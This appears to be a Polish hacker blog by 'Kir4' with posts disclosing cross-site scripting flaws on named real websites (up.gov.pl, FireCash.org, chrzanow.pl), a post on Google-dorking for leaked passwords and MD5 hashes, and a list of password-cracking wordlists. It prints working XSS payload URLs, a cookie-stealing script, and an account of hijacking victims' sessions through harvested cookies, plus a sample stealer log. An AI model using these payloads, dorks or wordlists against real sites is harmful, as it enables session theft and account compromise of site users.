[XSS]up.gov.pl
Błąd został zgłoszony
http://www.up.gov.pl/index.php?id=128&act=search&word=%22%3E%3Ch1%3E%3Cscript%3Edocument.write%28%27%3Cdiv+style%3D%22width%3A500px%3Bheight%3A500px%3Bposition
%3Aabsolute%3Bbackground%3Ablack%3Bcolor%3Awhite%3B+font-size%3A30%3B+padding-left%3A100px%3Bpadding-top%3A70px%3B%22%3EPozdro+by+Kir4%3C%2Fdiv%3E%27%29%3B%3C%2Fscript%3E%3C%2Fh1%3E&submit=
Autor:
Kir4
0
komentarze
[XSS]FireCash.org
Cześć, wykryłem błąd na stronie znalazłem XSS, wchodzimy http://firecash.org/...site-your-sites
dajemy dodaj słowo kluczowe i wpisujemy tam
"><h1><script>alert(document.cookie)</script>
</h1> i wyskakuję nam pełny błąd XSS coockies na wierzchu co
jeszcze jedna rzecz jest dziwna ? Że jak raz dodamy ten skrypt to potem
nie możemy usunąć więc niech nikt nie próbuję ten błąd jest tylko do
administracji zgłaszany. Druga sprawa już troszkę ważniejsza ... gdy
edytujemy gateway wypełniamy wszystkie pola
"><h1><script>alert(document.cookie)</script>
</h1> oprócz paru pol które.
Płatności
Wszystkie pola są podatne na XSS
Pozycjonowanie Strony
System Gateway
Najgorsze to ostatni screen ! Gdy ktoś rozwiązuję gateway to wyskakuję mu komunikat z XSS wyskakują jego cookies które można łatwo przejąć.
Po prostu gdy ofiara wejdzie wypełni ankietę do mnie przychodzi email z logami i coockies i wchodzę jako jedno razowa sesja i mogę wykonać każdy ruch aż do wyloogowania albo opróżnienia coockies . Aby uniknąć problemu wystarczy włączyć filtrowanie w htmlu. Pozrawiam
Błąd dawno zgłoszony nie wiem czy jeszcze działa
Autor:
Kir4
0
komentarze
Jak sprawdzić czy google nie indexuje naszych haseł?
Witam, otóż większość ludzi korzystająca z Google nie zna mocy Gigantycznego Wujka.
Jak łatwo sprawdzić czy nasze hasło nie indexuje google ? Jest parę opcji które przydadzą się każdemu ciekawskiemu.
Używamy strony http://www.md5hashgenerator.com/ i generujemy nasze hasło. Po wygenerowaniu hasła powinniśmy dostać między innymi taki hash e3afed0047b08059d0fada10f400c1e5 (Admin) oczywiście każdy będzie inny po wpisaniu różnych fraz do generatora. Gdy już nam wygenerowało tak zwany hash MD5. Wrzucamy go w google, i sprawdzamy czy google nie pokazuje nam rozkodowanego hashu jeśli masz uniwersalne hasło typu moje53hashlo421 itp i znajdzie się w googlach to prawdopodobnie Atakujący skorzystał z dostępu do twoich kont. Ważne aby zmieniać hasła na każdych forach / portalach szczególnie typu Facebook,nk,allegro ! Gdy wpisałem hash który wygenerowałem były linijki typu
CMS'y typu Wordpress, Joomla czy też np phpbb3 zawierają hashe z Saltem tzw solone. Dzięki takiemu saltowi łamanie haseł trwa znacznie dłużej i utrudnia crackerowi zdobycia naszego hasła.
np
Drugi przykład tak zwany " Google Dork "
Wpisujemy w google np :
url/host:nk.pl lub filetype:txt intext:naszehasło
i gdy zobaczymy podobną treść do tej lub wszystko inne co związane z naszym hasłem
To prawdopodobnie mamy Stealera w komputerze (lub ktoś opublikował twoje hasło np łamiąc hash md5 )Wysyła nasze logi np na email wasze hasła, loginy do kont bankowych, facebooka itp. Więc radzę przeskanować komputer i zmienić hasła po wywaleniu tego syfu.
Przydatne linki:
http://www.insidepro.com/hashes.php
http://www.md5hashgenerator.com/
Jest jeszcze wiele innych sposób zdobycia waszego hasła, ale to już w następnych artach. Pozdrawiam ;)
Jak łatwo sprawdzić czy nasze hasło nie indexuje google ? Jest parę opcji które przydadzą się każdemu ciekawskiemu.
Używamy strony http://www.md5hashgenerator.com/ i generujemy nasze hasło. Po wygenerowaniu hasła powinniśmy dostać między innymi taki hash e3afed0047b08059d0fada10f400c1e5 (Admin) oczywiście każdy będzie inny po wpisaniu różnych fraz do generatora. Gdy już nam wygenerowało tak zwany hash MD5. Wrzucamy go w google, i sprawdzamy czy google nie pokazuje nam rozkodowanego hashu jeśli masz uniwersalne hasło typu moje53hashlo421 itp i znajdzie się w googlach to prawdopodobnie Atakujący skorzystał z dostępu do twoich kont. Ważne aby zmieniać hasła na każdych forach / portalach szczególnie typu Facebook,nk,allegro ! Gdy wpisałem hash który wygenerowałem były linijki typu
e3afed0047b08059d0fada10f400c1e5:Adminitp . Oczywiście iż nie każdy skrypt szyfruje w MD5 a np w SHA1 i innych tego typu Hashach.
e3afed0047b08059d0fada10f400c1e5 Admin
Admin:e3afed0047b08059d0fada10f400c1e5
e3afed0047b08059d0fada10f400c1e5
admin
CMS'y typu Wordpress, Joomla czy też np phpbb3 zawierają hashe z Saltem tzw solone. Dzięki takiemu saltowi łamanie haseł trwa znacznie dłużej i utrudnia crackerowi zdobycia naszego hasła.
np
Drugi przykład tak zwany " Google Dork "
Wpisujemy w google np :
url/host:nk.pl lub filetype:txt intext:naszehasło
i gdy zobaczymy podobną treść do tej lub wszystko inne co związane z naszym hasłem
Program: Google ChromeUrl/Host: http://www.nk.pl/Login: Nasz email/loginPassword: naszehasloComputer: PCDate: 2013-01-13 13:22:20Ip: IP
To prawdopodobnie mamy Stealera w komputerze (lub ktoś opublikował twoje hasło np łamiąc hash md5 )Wysyła nasze logi np na email wasze hasła, loginy do kont bankowych, facebooka itp. Więc radzę przeskanować komputer i zmienić hasła po wywaleniu tego syfu.
Przydatne linki:
http://www.insidepro.com/hashes.php
http://www.md5hashgenerator.com/
// Nie odpowiadam za złe użycie lub celowe wykorzystanie tego artykułu w zły sposób. Np uzyskanie danych nie do swoich kont//
Jest jeszcze wiele innych sposób zdobycia waszego hasła, ale to już w następnych artach. Pozdrawiam ;)
Autor:
Kir4
0
komentarze
[TXT]Słowniki
Wrzuciłem parę słowników, każdemu może się przydać ;)
https://dazzlepod.com/site_media/txt/passwords.txt
https://github.com/tomrittervg/simple-crypto-pack/blob/master/common/simple-dictionary.txt
http://knuth.luther.edu/~bmiller/wordlist.txt
http://www.cs.ucsb.edu/~buoni/cs8/homeworks/wordlist.txt
http://cd.textfiles.com/suzybatari2/wordwork/dicwords/wordlist.txt
http://grimwepa.googlecode.com/svn-history/r68/trunk/grimwepa1.1/wordlist.txt
http://java.net/projects/opends/sources/svn/content/branches/replication-service/resource/config/wordlist.txt?rev=6678
Pozdrawiam, jeśli ktoś będzie potrzebował więcej podam dorka na gg.
Autor:
Kir4
0
komentarze
[XSS]chrzanow.pl
Miejski Serwis Informacyjny Chrzanowa
http://www.chrzanow.pl/index.php?id=666&%27p=firm%2C0%2Csearch&search=XSS
Błąd został zgłoszony
Autor:
Kir4
0
komentarze
Subskrybuj:
Posty (Atom)